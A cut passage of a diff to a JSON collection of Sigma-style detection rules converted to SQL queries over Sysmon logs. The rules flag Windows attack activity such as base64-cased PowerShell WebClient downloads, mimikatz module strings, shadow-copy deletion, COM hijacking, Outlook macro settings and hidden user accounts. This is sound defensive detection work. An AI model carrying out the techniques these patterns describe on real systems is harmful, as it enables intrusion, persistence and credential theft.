'%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE 
'%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE 
'%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE 
'%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE 
'%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND Details = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_webclient_casing.yml" + "filename": "registry_set_susp_printer_driver.yml" }, { - "title": "Suspicious SYSTEM User Process Creation", - "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", - "status": "test", - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", + "title": "Potential Persistence Via COM Hijacking 
From Suspicious Locations", + "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "status": "experimental", + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], "falsepositives": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Probable legitimate applications. If you find these please add them to an exclusion list" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine 
LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (Image LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE 
'%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%\\%appdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_user_anomaly.yml" + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" }, { - "title": "LockerGoga Ransomware Activity", - "id": "74db3488-fd28-480a-95aa-b7af626de068", - "status": "stable", - "description": "Detects LockerGoga ransomware activity via specific command line.", - "author": "Vasiliy Burov, oscd.community", + "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", + "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "status": "experimental", + "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND 
EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" + "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" }, { - "title": "Xwizard DLL Sideloading", - "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "title": "Hiding User Account Via SpecialAccounts Registry Key", + "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "status": "test", - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1564.002" ], "falsepositives": [ - "Windows installed on non-C drive" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" + "filename": "registry_set_special_accounts.yml" }, { - "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", - "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "title": 
"Suspicious Application Allowed Through Exploit Guard", + "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", "status": "experimental", - "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", - "author": "frack113", + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" }, { - "title": "CreateDump Process Dump", - "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", - "status": "experimental", - "description": 
"Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell as a Service in Registry", + "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "status": "test", + "description": "Detects that a powershell code is written to the registry as a service.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Command lines that use the same flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_createdump.yml" + "filename": "registry_set_powershell_as_service.yml" }, { - "title": "Kavremover Dropped Binary LOLBIN Usage", - "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", - "status": "experimental", - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Outlook Macro Execution Without Warning Setting Enabled", + "id": 
"e3b50fa5-3c3f-444e-937b-0a99d33731cd", + "status": "test", + "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", + "author": "@ScoubiMtl", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_kavremover.yml" + "filename": "registry_set_office_outlook_enable_macro_execution.yml" }, { - "title": "PUA - Wsudo Suspicious Execution", - "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", + "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "status": "experimental", - "description": "Detects usage of wsudo (Windows Sudo Utility). 
Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentImage LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "HackTool - SharpView Execution", - "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits", + "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 
vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S, frack113", "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'SharpView.exe' OR Image LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' 